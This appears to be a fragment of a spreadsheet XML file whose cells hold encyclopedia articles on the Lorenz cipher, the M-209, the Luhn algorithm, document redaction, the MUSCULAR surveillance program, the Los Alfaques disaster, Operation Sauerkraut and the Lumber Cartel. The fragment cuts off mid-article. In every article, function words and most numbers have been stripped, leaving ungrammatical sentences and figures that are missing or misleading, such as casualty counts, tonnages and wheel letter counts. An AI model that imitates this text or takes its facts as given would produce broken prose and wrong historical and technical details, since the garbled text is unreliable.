guatemala nicaragua paraguay peru puerto rico sint maarten trinidad tobago turks caicos islands uruguay virgin islands venezuela also barter (economics) collaborative finance community exchange system (ces) complementary currency credit union list community currencies united states local currency mutualism (economic theory) sharing economy (access economy) time-based currency (time banking) bank (switzerland) references further reading lets faqs, john croft gaia foundation letsystems faq, letsgo manchester letsystem design manual letsystem, local currency works, michael linton, 1984, context institute definition letsystem 1986, landsman community services ltd. open money project software time social banking universal time-banking webapp community accounting software drupal 2003 update westport lets, richard douthwaite what community exchange system?</t>
  </si>
  <si>
    <t>Sauerkraut missions</t>
  </si>
  <si>
    <t>sauerkraut missions (operation sauerkraut) secret service operations planned carried american office strategic services (oss) second world july 1944 least march 1945. enable rapid dissemination allied propaganda material german prisoners war. idea utilizing german prisoners agents arose failed assassination attempt adolf hitler july 1944. exploiting unexpected psychological advantage, deployment apparently german soldiers wehrmacht uniforms considered particularly suitable indoctrinating enemy without much delay. prisoner camp germans near naples, efforts made recruit first candidates mission. time, suitable leaflets developed referred attempted coup july smuggled german territory. thus, example, claimed walther brauchitsch taken command germany, german troops called upon carry revolutionary measures nazi regime. extra issue magazine neue deutschland also produced, pointed alleged opposition groups within german reich. after initially selecting trustworthy prisoners war, first transported rome equipped accordingly. this included german wehrmacht uniforms, forged documents, weapons compasses. money italian currency, cigarettes first equipment also included. small groups smuggled across river arno. they penetrate deeply possible behind german lines spread propaganda material given. example, leaflets magazines placed trees, cars, buildings roads. particular importance forged documents given agents. since german side constantly changing certain recognition features security reasons, side regularly improve them, apparently succeeded brilliantly. although agents operation later reportedly checked german military police several occasions, case agent exposed. while forged documents look perfect possible included forged party books along party stamps propaganda material provided deliberately printed much coarser quality. this avoid impression stickers, leaflets magazines material produced abroad enemy using high-quality printing presses. total, missions operation sauerkraut carried out. purpose, small groups smuggled behind german lines july 1944 least march 1945. since international prohibits deliberately placing prisoners dangerous situations, operation sauerkraut personnel sign declaration certifying voluntary participation. lawyers considered procedure indispensable event legal action taken army international court. although german agents operation sauerkraut promised preferential treatment services u.s. side, merely returned regular camps deployment. there shunned fellow prisoners knowledge agent activities despised traitors. references further reading traussnig, florian (2017). geistiger widerstand außen. böhlau wien. isbn 978-3-205-20382-7. clayton laurie. "the sauerkrauts": german prisoners agents 1944—1945, google books external links "operation sauerkraut", codenames.info, february 2022</t>
  </si>
  <si>
    <t>Lorenz cipher</t>
  </si>
  <si>
    <t>lorenz sz40, sz42a sz42b german rotor stream cipher machines used german army world they developed lorenz berlin. model name derived schlüssel-zusatz, meaning cipher attachment. instruments implemented vernam stream cipher. british cryptanalysts, referred encrypted german teleprinter traffic fish, dubbed machine traffic tunny (meaning tunafish) deduced logical structure three years machine.the machines in-line attachments standard teleprinters. experimental link using sz40 machines started june 1941. enhanced sz42 machines brought substantial mid-1942 onwards high-level communications german high command wünsdorf close berlin, army commands throughout occupied europe. advanced sz42a came routine february 1943 sz42b june 1944.radioteletype (rtty) rather land-line circuits used traffic. these non-morse (nomo) messages picked britain's y-stations knockholt kent denmark hill south london, sent government code cypher school bletchley park (bp). some deciphered using hand methods process partially automated, first robinson machines colossus computers. deciphered lorenz messages made significant contributions british ultra military intelligence allied victory europe, high-level strategic nature information gained lorenz decrypts. history after second world group british cryptanalysts entered germany front-line troops capture documents, technology personnel various german signal intelligence organizations secrets could destroyed, looted, captured soviets. they called target intelligence committee: ticom.from captured german cryptographers huttenhain fricke learnt development sz40 sz42 a/b. design machine could attached teleprinter. first machine referred sz40 (old type) rotors fixed cams. recognised security machine great. definitive sz40 twelve rotors movable cams. rightmost five rotors called spaltencäsar named wheels bill tutte. leftmost five named springcäsar, wheels tutte. middle vorgeleger rotors called motor wheels tutte. five data bits ita2-coded telegraph character processed first five wheels processed five wheels. cams wheels reversed value raised position, left unchanged lowered position. vernam cipher gilbert vernam at&amp;t bell labs research engineer who, 1917, invented cipher system used boolean "exclusive (xor) function, symbolised this represented following "truth table", represents "true" represents "false". other names function are: equal (neq), modulo addition (without 'carry') modulo subtraction (without 'borrow'). vernam's cipher symmetric-key algorithm, i.e. used encipher plaintext produce ciphertext decipher ciphertext yield original plaintext: and: this produces essential reciprocity allows machine settings used encryption decryption. vernam's idea conventional telegraphy practice paper tape plaintext combined paper tape key. each tape would unique one-time tape), generating distributing tapes presented considerable practical difficulties. 1920s four different countries invented rotor cipher machines produce stream instead tape. 1940 lorenz sz40/42 these. stream logical functioning tunny system worked well bletchley park cryptanalysts machines—which happened 1945, germany surrendering allies. machine served in-line attachment standard lorenz teleprinter. metal base 15.5 high. teleprinter characters consisted five data bits "impulses"), encoded international telegraphy alphabet (ita2). machine generated stream pseudorandom characters. these formed combined plaintext input characters form ciphertext output characters. combination means modulo addition) process.the stream consisted component parts xor-ed together. these generated sets five wheels rotated together. bletchley park cryptanalyst bill tutte called ("chi") wheels, ("psi") wheels. each wheel series cams "pins") around circumference. these cams could raised (active) lowered (inactive) position. raised position generated reversed value bit, lowered position generated left unchanged. number cams wheel equalled number impulses needed cause complete full rotation. these numbers co-prime other, giving longest possible time pattern repeated. this product number positions wheels. wheels 22,041,682 wheels 322,303,017. number different ways twelve wheels could 1.603×1019 i.e. billion billion. five wheels moved position character enciphered. five wheels, however, advanced intermittently. their movement controlled ("mu") "motor" wheels series. sz40 motor wheel stepped every time motor wheel stepped first motor wheel '1'. wheels stepped second motor wheel '1'. sz42a sz42b models added additional complexity mechanism, known bletchley park limitations. four different limitations involved characteristics plaintext autoclaves.the stream generated machines thus component component. symbolically, combined plaintext enciphering ciphertext deciphering, represented follows. χ-key ψ-keyhowever indicate component often change character character, term extended used, symbolised enciphering shown symbolically plaintext χ-stream ψ'-stream ciphertextand deciphering ciphertext χ-stream ψ'-stream plaintext. operation each "tunny" link four machines transmitting receiving teleprinter end. enciphering deciphering work, transmitting receiving machines identically. there components this; setting patterns cams wheels rotating wheels start enciphering message. settings changed less frequently summer 1944. wheel cams initially changed quarterly, later monthly, wheels changed monthly motor wheel patterns changed daily. from august 1944, wheel patterns changed daily.initially wheel settings message sent receiving means 12-letter indicator sent un-enciphered, letters associated wheel positions book. october 1942 changed book single-use settings known book. last digits book entry sent receiving operator look copy book machine's wheels. each book contained hundred combinations. once combinations book used replaced one. message settings never re-used, occasion were, providing "depth", could utilised cryptanalyst.as normal telegraphy practice, messages length keyed teleprinter paper tape perforator. typical sequence operations would sending operator would punch message, make contact receiving operator, switch machine connect circuit, tape reader. receiving end, operator would similarly connect machine circuit output would printed continuous sticky tape. because practice, plaintext contain characters "carriage return", "line feed" null (blank tape, 00000) character. cryptanalysis british cryptographers bletchley park deduced operation machine january 1942 without ever seen lorenz machine, feat made possible mistake made german operator. interception tunny traffic known station operators used listening morse code transmission "new music". interception originally concentrated foreign office station operated metropolitan police denmark hill camberwell, london. lack resources time (around 1941), given priority. station, knockholt kent, later constructed specifically intercept tunny traffic messages could efficiently recorded sent bletchley park. head station, harold kenworthy, moved head knockholt. later promoted head foreign office research development establishment (f.o.r.d.e). code breaking august 1941, message 4,000 characters transmitted athens vienna. however, message received correctly end. receiving operator sent uncoded request back sender asking message retransmitted. this codebreakers know happening. sender retransmitted message but, critically, change settings original "hqibpexezmug". this forbidden practice; using different every different message critical stream cipher's security. this would mattered messages identical, however second time operator made number small alterations message, using abbreviations, making second message somewhat shorter. from related ciphertexts, known cryptanalysts depth, veteran cryptanalyst brigadier john tiltman research section teased plaintexts hence keystream. even almost 4,000 characters enough team figure stream generated; complex seemingly random. after three months, research section handed task mathematician bill tutte. applied technique taught cryptographic training, writing hand looking repetitions. tutte original teleprinter 5-bit baudot codes, initial breakthrough recognising 41-bit repetition. over following months january 1942, tutte colleagues worked complete logical structure cipher machine. this remarkable piece reverse engineering later described "one greatest intellectual feats world ii".after cracking tunny, special team code breakers ralph tester, initially transferred alan turing's team became known testery. performed bulk subsequent work breaking tunny messages, aided machines complementary section newman known newmanry. decryption machines several complex machines built british attack tunny. first british tunny. this machine designed bletchley park, based reverse engineering work done tiltman's team testery, emulate lorenz cipher machine. when wheel settings found testery, tunny machine messages could printed. family machines known "robinsons" built newmanry. these used paper tapes, along logic circuitry, find settings wheels lorenz machine. robinsons major problems keeping paper tapes synchronized relatively slow, reading 2,000 characters second. important machine colossus war's end, first becoming operational december 1943. although fully programmable, efficient predecessors, representing advances electronic digital computers. colossus computers developed built tommy flowers, dollis hill post office research station, using algorithms developed bill tutte team mathematicians. colossus proved efficient quick twelve-rotor lorenz sz42 on-line teleprinter cipher machine. some influential figures doubts proposed design decryption machine, flowers proceeded project partly funding himself. like later eniac 1946, colossus stored program, programmed plugboards jumper cables. faster, reliable capable robinsons, speeding process finding lorenz wheel settings. since colossus generated putative keys electronically, read tape. optical reader which, 5,000 characters second, driven much faster robinsons' meant tape travelled almost miles hour km/h). this, clocking electronics optically read paper tape sprocket holes, completely eliminated robinsons' synchronisation problems. bletchley park management, sceptical flowers's ability make workable device, immediately began pressuring construct another. after war, colossus machines dismantled orders winston churchill, gchq retained them. testery executives tunny codebreakers ralph tester: linguist head testery jerry roberts: shift-leader, linguist senior codebreaker peter ericsson: shift-leader, linguist senior codebreaker victor masters: shift-leader denis oswald: linguist senior codebreaker peter hilton: codebreaker mathematician peter benenson: codebreaker peter edgerley: codebreaker john christie: codebreaker john thompson: codebreaker jenkins: codebreaker shaun wylie: codebreaker colvill: general managerby war, testery grown nine cryptographers girls women serving role called), total staff 118, organised three shifts working round clock. surviving machines lorenz cipher machines built small numbers; today handful survive museums. germany, examples seen heinz nixdorf museumsforum, computer museum paderborn deutsches museum, museum science technology munich. lorenz machines also displayed bletchley park national museum computing united kingdom. another example also display national cryptologic museum united states. john whetter john pether, volunteers national museum computing, bought lorenz teleprinter ebay £9.50 retrieved garden shed southend-on-sea. found world military version, refurbished 2016 installed next sz42 machine museum's "tunny" gallery. also enigma machine siemens halske turingery combined cipher machine notes references churchhouse, robert (2002), codes ciphers: julius caesar, enigma internet, cambridge: cambridge university press, isbn 978-0-521-00890-7 copeland, jack, (2006), colossus: secrets bletchley park's codebreaking computers, oxford: oxford university press, isbn 978-0-19-284055-4 davies, donald lorenz cipher machine sz42, (reprinted selections cryptologia: history, people, technology, artech house, norwood, 1998) flowers, thomas (2006), colossus copeland 2006, 91–100 good, jack (1993), enigma fish hinsley stripp 1993, 149–166 good, jack; michie, donald; timms, geoffrey (1945), general report tunny: with emphasis statistical methods, public record office 25/4 25/5, archived original 2010-09-17, retrieved 2010-09-15. (facsimile copy) sale, tony (2001), part "general report tunny", newmanry history, formatted tony sale (pdf), retrieved 2010-09-20. (transcript much document format) ellsbury, graham, general report tunny with emphasis statistical methods, retrieved 2010-11-03. (web transcript part halton, (1993), tunny machine hinsley stripp 1993, 167–174 hinsley, stripp, alan, eds. (1993) [1992], codebreakers: inside story bletchley park, oxford: oxford university press, isbn 978-0-19-280132-6 hinsley, (1993), introduction fish hinsley stripp 1993, 141–148 huttenhain, orr; fricke (1945), okw/chi cryptanalytic research enigma, hagelin cipher teleprinter messages, ticom klein, melville, securing record communication: tsec/kw-26 (pdf), archived original (pdf) 2012-03-15, retrieved 2010-09-17 parrish, thomas (1986), ultra americans: u.s. role breaking nazi codes, york: stein day, isbn 978-0-8128-3072-9 rezabek, randy (2017), ticom: hunt hitler's codebreakers, independently published, isbn 978-1-5219-6902-1 roberts, jerry (2006), major tester's section copeland 2006, 249–259 roberts, jerry (2009), top-secret codebreaking during world last british survivor bletchley park's testery (video), university college london sale, tony, lorenz cipher bletchley park broke retrieved 2010-10-21 tutte, june 1998), fish (pdf), archived original (pdf) 2015-02-12, retrieved 2015-02-13 transcript lecture given prof. tutte university waterloo entry "tunny" gc&amp;cs cryptographic dictionary further reading budiansky, stephen (2000), battle wits: complete story codebreaking world free press, isbn 978-0684859323 contains short informative section (pages 312–315) describing operation tunny, attacked. flowers, (1983), "the design colossus", annals history computing, (3): 239–252, doi:10.1109/mahc.1983.10079, s2cid 39816473* paul gannon, colossus: bletchley park's greatest secret (atlantic books, 2006). using recently declassified material dealing exclusively efforts break tunny. clears many previous misconceptions fish traffic, lorenz cipher machine colossus. small, albert (1944), special fish report, retrieved 2010-09-21 smith, michael (2007) [1998], station codebreakers bletchley park, grand strategy series (pan books ed.), london: macmillan ltd, isbn 978-0-330-41929-1 contains lengthy section (pages 148–164) tunny british attack external links frode weierud’s cryptocellar historical documents publications lorenz schlüsselzusatz sz42. retrieved april 2016. lorenz ciphers colossus photographs description tunny simplified lorenz cipher toolkit brailsford, david. "fishy codes: bletchley's other secret" (video). brady haran. archived original 2021-12-12. retrieved 2015-07-10. "tunny" machine solution brigadier general john tiltman national security agency general report tunny: with emphasis statistical methods national archives general report tunny: with emphasis statistical methods jack good, donald michie, geoffrey timms 1945. virtual lorenz</t>
  </si>
  <si>
    <t>Los Alfaques disaster</t>
  </si>
  <si>
    <t>alfaques disaster road accident tanker explosion occurred tuesday july 1978 alcanar, near tarragona, spain. tanker truck loaded tons highly flammable liquefied propylene. people (including driver) killed severely burned. most victims vacationers (both spanish foreign tourists) alfaques seaside campsite. campsite located n-340 national road, south town sant carles ràpita. renovated since still exists today. circumstances truck, consisting pegaso tractor unit registered m-7034-c fruehauf semi-trailer tanker registered m-7981-r, owned cisternas reunidas s.a. 10:15 day, truck, driven 50-year-old francisco imbernón villena, arrived state-owned enpetrol refinery, located pobla mafumet, north tarragona, loaded propylene another state-owned company, paular (now repsol), puertollano. 12:05 truck left refinery carrying 25.87 short tons (23.47 23,470 propylene, tons maximum design load 19.35 tons. tanker drivers instructions take smaller n-340 national road instead larger motorway carrying cargo barcelona, order avoid motorway toll. time disaster, n-340 narrow winding coastal road carried drivers directly several densely populated areas. summer temperatures (68–95 °f), pressure tank would 1,200–1,700 (170–250 psi). accident disaster occurred 14:35, truck moving past alfaques campsite travelled mi). driver's watch, found still attached driver's burned wrist, stopped 14:36, time explosion.there several different witness reports events directly preceding blast, less equally plausible. some reported tank already leaking approached site, sprang leak loud bang passing site, stopped driver. others reported bang caused blown tire caused truck swerve control crash wall separating campsite roadside, possibly overturning process.in either case, leaking tanker formed cloud gaseous propylene partially entered campsite also drifted wind towards discothèque northeast. white cloud attracted attention campsite patrons, approached cloud curiosity continued spread; became dense many unable tanker. cloud began permeate discothèque, reached spark, ignition source instantly flashed back towards source, almost instantaneously caused weakened tank explode, igniting entire load gas. time campsite south crowded nearly 1,000 vacationers, mostly german foreign tourists, packed tightly trailers tents. blast fireball (which estimated 1,000 (1,830 left metres crater), destroyed everything cars, trailers buildings within (300 radius, charred everything within (980 radius, gutting main camping area. (4,300 discothèque northeast, later determined likely source ignition, also razed, killing staff members inside. additionally, vehicles tents charred, restaurant partially collapsed, tanker truck broken three main pieces. victims emergency response explosion fireball instantly killed driver people within area. total people died site result initial explosion subsequent fires explosions cars cylinders used tourists. victims seen hair clothing fire, fleeing attempt flames. first minutes disaster, wounded removed uncoordinated fashion help survivors using cars vans. locals also provided help took wounded hospitals. ambulances emergency forces gradually arrived. civil guard armed forces searched devastated camp survivors. took three hours last wounded removed taken hospital. burning tanker blocked road, dividing injured groups, taken northwards southwards. road north, injured received adequate medical care, reached either hospitals amposta tortosa. stage, final destination severely burned patients francisco franco hospital barcelona. eighty-two severely burned patients taken south hospital valencia. cases medical steps importance taken journey. several injured developed severe shock journey measurable blood pressure arrival. many patients burns covering bodies, died following days. contributing high mortality figure inappropriate medical care given route hospital.in week following disaster, patients france, germany, belgium netherlands evacuated countries. people wounded, severely. people died result disaster, total number people died following months result injuries least 270. among them, four spaniards, others foreigners. official figure number victims 215.many victims burned beyond recognition. most wearing swimming suits, building documents stored destroyed explosion. there test available time. result work done forensic teams tourists' home countries, victims eventually identified. seven victims remained unidentified time later, interred cemetery tortosa, tarragona. bodies french family, consisting couple children, returned france years later, compensation settled. bodies another family three originating colombia never sent home, remain foreigners interred cemetery tortosa along local victims. inquiry following accident, cisternas reunidas accepted responsibility disaster, denied order prohibition drivers motorway instead national road, claiming driver chose road take. later, workers tarragona plant stated heard imbernón heatedly arguing someone phone demanding money motorway toll. enpetrol initially declined responsibility, claiming delivery cargo carrier's responsibility, received complaint.the official inquiry determined truck severely overloaded, also lacked emergency pressure release valves, designed help prevent boiling liquid expanding vapor explosion (bleve) case fire. however, valves longer mandatory 1978 previously been. truck inspection check-over 1980, passed previous inspection. tank container manufactured december 1973 workshop bilbao, time meet requirements carrying flammable liquids, since lacked emergency pressure release valves. therefore, tank used carry substances, highly corrosive. tests remnants steel tank revealed microscopic stress cracks consistent corrosion caused previous loads improperly overpressurized anhydrous ammonia. combined whether tanker suffered impact caused additional structural damage, factors likely almost instantaneous rupture tank flames flashed back tanker. even without safety valves, structurally sound properly filled tanker able maintain structural integrity fire long enough least allow nearby people escape. inquiry also revealed overloading tankers common practice enpetrol refineries. tarragona facility lacked either meter measure amount dispensed automatic shut-off device prevent overfilling, consequently tanks consistently overloaded. driver neither informed overloading, type class cargo, means check pressure level tank departed monitor transit. attended hazmat training program drivers dangerous goods, company considered experience twenty years truck driver sufficient. inquiry also determined that, january july year, tanks left tarragona refinery overloaded, drivers imbernón. aftermath after tragedy, transit populated areas vehicles carrying dangerous cargo prohibited spain, would driven night. 1982, four employees enpetrol cisternas reunidas convicted criminal negligence, sentenced prison four years. later, four released appealing court's decision, prison sentences suspended reduced. companies paid equivalent €13.23 million (not allowing inflation) compensation victims. popular culture accident featured 2007 german film disaster, directed peter keglevic. however, film loosely based real facts, contains blunders factual errors, cars registration plates could appeared years later, driver spending night home already (over)loaded tanker parked front house. alfaques today months tragedy, completely renovated campsite reopened tourists alfaques continued operation.in 2012 owners still-operating alfaques campsite sought relief spanish courts newly approved "right forgotten" passed spain, arguing google's search results unfairly weighted towards 1978 disaster driving away business. campsite owners protested even years disaster, google search results "los alfaques" still focused 1978 tragedy, including many gruesome thumbnails burnt human remains, stacked caskets coroner procedures cleanup campground. trial dismissed, plaintiffs informed would need pursue u.s. lawsuit google. also list transportation fires notes references czech magazine "svět motorů" (the world motors) no.36/1978 hymes, boydell, prescott, institution chemical engineers (great britain). thermal radiation physiological pathological effects. icheme pub, 1996. appx. case hist. 97–110. external links article accident, including photos truck remnants spanish) article accident pais" spanish) article trial pais" spanish) alfaques campsite page collection articles alfaques disaster spanish) scan article czech magazine svět motorů 36/1978 "day disaster (aka tarragona paradies flammen)". imdb. 2007.</t>
  </si>
  <si>
    <t>Sanitization (classified information)</t>
  </si>
  <si>
    <t>sanitization process removing sensitive information document message sometimes encrypting it), document distributed broader audience. when intent secrecy protection, dealing classified information, sanitization attempts reduce document's classification level, possibly yielding unclassified document. when intent privacy protection, often called data anonymization. originally, term sanitization applied printed documents; since extended apply computer files problem data remanence. redaction sanitization sense distinguished editing sense) blacking deletion text document result intended allow selective disclosure information document keeping parts document secret. typically result document suitable publication dissemination others rather intended audience original document. example, document subpoenaed court case, information specifically relevant case hand often redacted. government secrecy context government documents, redaction (also called sanitization) generally refers specifically process removing sensitive classified information document prior publication, declassification. secure document redaction techniques redacting confidential material paper document public release involves overwriting portions text wide black pen, followed photocopying result—the obscured text recoverable original. alternatively opaque "cover tape" "redaction tape", opaque, removable adhesive tape various widths, applied photocopying. this simple process minor security risks. example, black tape wide enough, careful examination resulting photocopy still reveal partial information text, difference short tall letters. exact length removed text also remains recognizable, help guessing plausible wordings shorter redacted sections. where computer-generated proportional fonts used, even information leak redacted section form exact position nearby visible characters. national archives published document, redaction toolkit, guidelines editing exempt information documents prior release, provide guidance editing exempt material information held public bodies." secure redacting complicated computer files. word processing formats save revision history edited text still contains redacted text. file formats, unused portions memory saved still contain fragments previous versions text. where text redacted, portable document (pdf) word processor formats, overlaying graphical elements (usually black rectangles) text, original text remains file uncovered simply deleting overlaying graphics. effective redaction electronic documents requires removal relevant text image data document file. this process, internally complex, carried easily user "redaction" functions software editing files. redaction administratively require marking redacted area reason content restricted. government documents released freedom information marked exemption codes denote reason content withheld. national security agency (nsa) published guidance document provides instructions redacting files. printed matter printed documents contain classified sensitive information frequently contain great deal information less sensitive. there need release less sensitive portions uncleared personnel. printed document consequently sanitized obscure remove sensitive information. maps also redacted reason, highly sensitive areas covered slip white paper. cases, sanitizing classified document removes enough information reduce classification higher level lower one. example, intelligence reports contain highly classified information identities spies, removed reports distributed outside intelligence agency: initial report classified secret sanitized report classified secret. cases, report liberty incident (right), report sanitized remove sensitive data, report released general public. seen liberty report, paper documents usually sanitized covering classified sensitive portions photocopying document. computer media files computer (electronic digital) documents difficult sanitize. many cases, information information system modified erased, data remains storage. this accident design, underlying storage mechanism (disk, ram, etc.) still allows information read, despite nominal erasure. general term problem data remanence. contexts (notably nsa, dod, related organizations), sanitization typically refers countering data remanence problem; redaction used sense article. however, retention deliberate feature, form undo buffer, revision history, "trash can", backups, like. example, word processing programs like microsoft word sometimes used edit sensitive information. unfortunately, products always show user information stored file, possible file still contain sensitive information. cases, inexperienced users ineffective methods fail sanitize document. metadata removal tools designed effectively sanitize documents removing potentially sensitive information. 2005 military published report death nicola calipari, italian secret agent, military checkpoint iraq. published version report format, incorrectly redacted covering sensitive parts opaque blocks software. shortly thereafter, readers discovered blocked-out portions could retrieved copying pasting word processor.on 2006, lawyers communications service provider at&amp;t filed legal brief regarding cooperation domestic wiretapping nsa. text pages document incorrectly redacted, covered text could retrieved.at 2005, released report giving recommendations safely sanitize microsoft word document.issues make difficult reliably implement multilevel security systems, computer users differing security clearances share documents. challenge multilevel security gives example sanitization failure caused unexpected behavior microsoft word's change tracking feature.the common mistakes incorrectly redacting document adding image layer sensitive text obscure without removing underlying text, setting background color match text color. cases, redacted material still exists document underneath visible appearance subject searching even simple copy paste extraction. proper redaction tools procedures must used permanently remove sensitive information. this often accomplished multi-user workflow group people mark sections document proposals redacted, another group verifies redaction proposals correct, final group operates redaction tool permanently remove proposed items. also censorship data erasure data remanence freedom information laws country lacuna references external links embarrassing redaction failures vol. 2019, technology column judges' journal published american association</t>
  </si>
  <si>
    <t>Luhn algorithm</t>
  </si>
  <si>
    <t>luhn algorithm luhn formula, also known "modulus "mod algorithm, named creator, scientist hans peter luhn, simple checksum formula used validate variety identification numbers, credit card numbers, imei numbers, national provider identifier numbers united states, canadian social insurance numbers, israeli numbers, south african numbers, swedish national identification numbers, swedish corporate identity numbers (orgnr), greek social security numbers (αμκα), card numbers survey codes appearing mcdonald's, taco bell, tractor supply receipts. described u.s. patent 2,950,048, granted august 1960.the algorithm public domain wide today. specified iso/iec 7812-1. intended cryptographically secure hash function; designed protect accidental errors, malicious attacks. most credit cards many government identification numbers algorithm simple method distinguishing valid numbers mistyped otherwise incorrect numbers. description check digit computed follows: number already contains check digit, drop digit form "payload." check digit often last digit. with payload, start rightmost digit. moving left, double value every second digit (including rightmost digit). digits resulting value position (using original value digit doubled previous step). check digit calculated {\displaystyle 10-(s\operatorname {mod} 10)} example computing check digit assume example account number "7992739871" (just "payload", check digit included): resulting digits check digit equal {\displaystyle 10-(67\operatorname {mod} 10)=3} this makes full account number read 79927398713. example validating check digit drop check digit (last digit) number validate. (e.g. 79927398713 7992739871) calculate check digit (see above) compare result original check digit. numbers match, result valid. (e.g. {\displaystyle (givencheckdigit=calculatedcheckdigit)\leftrightarrow (isvalidcheckdigit)} strengths weaknesses luhn algorithm detect single-digit error, well almost transpositions adjacent digits. not, however, detect transposition two-digit sequence vice versa). detect possible twin errors detect 77). other, complex check-digit algorithms (such verhoeff algorithm damm algorithm) detect transcription errors. luhn algorithm extension supports non-numerical strings. because algorithm operates digits right-to-left manner zero digits affect result cause shift position, zero-padding beginning string numbers affect calculation. therefore, systems specific number digits converting 1234 0001234 instance) perform luhn validation padding achieve result. algorithm appeared united states patent hand-held, mechanical device computing checksum. therefore, required rather simple. device took mechanical means. substitution digits, results double reduce procedure, produced mechanically. rather, digits marked permuted order body machine. pseudocode implementation function checkluhn(string purportedcc) ndigits length(purportedcc) parity (ndigits-2)modulus ndigits digit integer(purportedcc[i]) modulus parity digit digit digit digit digit digit return (sum modulus references external links implementation languages rosetta code project</t>
  </si>
  <si>
    <t>MUSCULAR (surveillance program)</t>
  </si>
  <si>
    <t>muscular (ds-200b), located united kingdom, name surveillance program jointly operated britain's government communications headquarters (gchq) u.s. national security agency (nsa) revealed documents released edward snowden interviews knowledgeable officials. gchq primary operator program. gchq secretly broken main communications links connect data centers yahoo! google. substantive information program made public october 2013. overview programme jointly government communications headquarters (gchq) (united kingdom) u.s. national security agency (nsa)muscular least four similar programs rely trusted party, programs together known windstop. 30-day period december 2012 january 2013, muscular responsible collecting million records. however dwarfed another windstop program known (insofar) code ds-300 codename incenser, collected billion records period. operational details according leaked document nsa's acquisitions directorate sends millions records every internal yahoo! google networks data warehouses agency's headquarters fort meade, maryland. program operates access point known ds-200b, outside united states, relies unnamed telecommunications operator provide secret access gchq.according washington post, muscular program collects twice many data points ("selectors" jargon) compared better known prism. unlike prism, muscular program requires (fisa type warrants.because huge amount data involved, muscular presented special challenge nsa's special source operations. example, yahoo! decided migrate large amount mailboxes data centers, nsa's pinwale database (their primary analytical database internet) quickly overwhelmed data coming muscular.closely related programmes called incenser turmoil. turmoil, belonging nsa, system processing data collected muscular.according post-it style note presentation, exploitation relied fact time least) data transmitted unencrypted inside google's private cloud, "google front servers" stripping respectively adding back from/to external connections. according washington post: "two engineers close ties google exploded profanity drawing." after information muscular published press, google announced working deploying encrypted communication datacenters. reactions countermeasures early november 2013, google announced encrypting traffic data centers. mid-november, yahoo! announced similar plans.in december 2013, microsoft announced similar plans used expression "advanced persistent threat" press release (signed-off legal representative), press immediately interpreted comparison chinese government-sponsored hackers. gallery also 2013 mass surveillance disclosures dishfire, another nsa–gchq collaboration collecting similar messages worldwide list government mass surveillance projects mass surveillance mass surveillance united kingdom mass surveillance united states squeaky dolphin, program targeting facebook, youtube, blogger stellarwind total information awareness references external links savage, charlie; miller, claire; perlroth, nicole (october 2013). "n.s.a. said google yahoo abroad". york times. retrieved november 2013. rushe, dominic; ackerman, spencer; ball, james (october 2013). "reports taps google yahoo data hubs infuriate tech giants". guardian. retrieved november 2013. gellman, barton; soltani, ashkan; lindeman, todd (october 2013). "how infiltrating private networks". washington post. retrieved november 2013. miller, claire (october 2013). "angry over u.s. surveillance, tech giants bolster defenses". york times. retrieved november 2013. schneier, bruce (october 2013). "nsa eavesdropping google yahoo networks". schneier security. retrieved november 2013. perlroth, nicole; markoff, john (november 2013). "n.s.a. have penetrated internet cable links". york times. retrieved november 2013. gellman, barton; delong, matt. "what yahoo google think could see". washington post. retrieved march 2014.</t>
  </si>
  <si>
    <t>Lumber Cartel</t>
  </si>
  <si>
    <t>lumber cartel facetious conspiracy theory popularized usenet claimed anti-spammers secretly paid agents lumber companies.in november 1997, participant news.admin.net-abuse.email posted essay newsgroup. essay described conspiracy theory: original anti-spammer truth major spammer major lumber companies deposited total $275,000 account. instantly stopped spamming began biggest anti-spam ring internet. reasoning provided essay certain companies first destroy forests make paper them, turn used send bulk mail. since sending e-mail spam paper all, essay argued, lumber companies would want stop would surpass paper-based bulk mailing, consequently lumber companies would anti-spam. rationale based disclaimers certain spam messages using electronic means order save paper. joke eventually club numerous parody websites, long since disappeared.gatherings anti-spammers usenet began ridicule proponents theory, many participants news.admin.net-abuse.email chose members "the lumber cartel" signatures, followed immediately acronymic disclaimer "tinlc" (there lumber cartel), reminiscent there cabal catchphrase. people able register website lumber cartel given sequential membership number. that added email files news.admin.net-abuse.email used personal websites. there verification requirement receive membership number. also culture jamming references external links lumber cartel started canadian branch lumber cartel (local netherlands lumber cartel united kingdom lumber cartel craggy island zhongguo (china) lumber cartel, local jargon file: "lumber cartel" glossary abusive hosts blocklist other ways spam wired gambling magazine's 1999 article spam, mentioning lumber cartel lumber cartel's dns-based blackhole list lumber cartel's "offishul" page. salon.com's 1999 article anti-spam efforts, mentioning lumber cartel</t>
  </si>
  <si>
    <t>M-209</t>
  </si>
  <si>
    <t>cryptography, m-209, designated csp-1500 united states navy (c-38 manufacturer) portable, mechanical cipher machine used military primarily world though remained active korean war. m-209 designed swedish cryptographer boris hagelin response request portable cipher machine, improvement earlier machine, c-36. m-209 size lunchbox, final form measuring 3+1⁄4 5+1⁄2 inches weighing pounds (2.7 (plus pound (0.45 case). represented brilliant achievement pre-electronic technology. rotor machine similar telecipher machine, lorenz cipher geheimfernschreiber. basic operation basic operation m-209 relatively straightforward. adjustable wheels display letter alphabet. these wheels comprise external machine, providing initial state, similar initialization vector, enciphering process. encipher message, operator sets wheels random sequence letters. enciphering-deciphering knob left side machine "encipher". dial known indicator disk, also left side, turned first letter message. this letter encoded turning hand crank power handle right side machine; cycle, ciphertext letter printed onto paper tape, wheels advance letter, machine ready entry next character message. indicate spaces words message, letter enciphered. repeating process remainder message gives complete ciphertext, transmitted using morse code another method. since initial wheel setting random, also necessary send settings receiving party; also encrypted using daily transmitted clear. printed ciphertext automatically spaced groups five m-209 ease readability. letter counter machine indicated total number encoded letters, could used point reference mistake made enciphering deciphering. deciphering procedure nearly enciphering; operator sets enciphering-deciphering knob "decipher", aligns wheels sequence used enciphering. first letter ciphertext entered indicator disk, power handle operated, advancing wheels printing decoded letter paper tape. when letter encountered, causes blank space appear message, thus reconstituting original message spaces. absent "z"s typically interpreted operator, based context. experienced m-209 operator might spend four seconds enciphering deciphering letter. internal elements overview inside casing m-209, much complicated picture emerges. wheels small movable aligned letter wheel. these pins positioned left right; positioning pins affects operation machine. left position ineffective, right position effective. each wheel contains different number letters, correspondingly different number pins. from left right, wheels have: letters, letters, excepting letters, excepting letters, letters, letters, qthis discrepancy chosen give wheel sizes coprime nature; result wheels align every 26×25×23×21×19×17 101,405,850 enciphered letters (also known period). each wheel associated slanted metal guide activated pins "effective" position. positions pins wheel comprise first part internal keying mechanism m-209. behind wheels cylindrical drum consisting horizontal 